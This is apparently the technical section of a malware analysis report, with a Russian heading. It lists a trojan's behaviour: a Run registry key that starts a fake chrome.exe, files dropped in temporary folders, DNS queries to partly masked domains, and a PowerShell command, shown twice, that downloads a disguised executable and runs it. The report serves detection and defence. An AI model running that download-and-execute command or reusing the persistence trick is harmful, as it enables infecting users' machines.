Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\] 'Chrome' = '%APPDATA%\chromez\chrome.exe'
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.az##p.xyz/gold/wheatstagnet.png','%TEMP%\wheatstagnet.exe');%TEMP%\wheatstagnet.exe
- chrome.exe
- %TEMP%\trbatehtqevyaw.sct
- %TEMP%\hc2.exe
- %TEMP%\wheatstagnet.exe
- %APPDATA%\chromez\chrome.exe
- http://www.az##p.xyz/gold/wheatstagnet.png
- http://bz##p.xyz/cream/stagnet.bin
- DNS ASK az##p.xyz
- DNS ASK bz##p.xyz
- DNS ASK st##a.cc
- '%TEMP%\wheatstagnet.exe'
- '%APPDATA%\chromez\chrome.exe' -m "%TEMP%\wheatstagnet.exe"
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.az##p.xyz/gold/wheatstagnet.png','%TEMP%\wheatstagnet.exe');%TEMP%\wheatstagnet.exe' (со скрытым окном)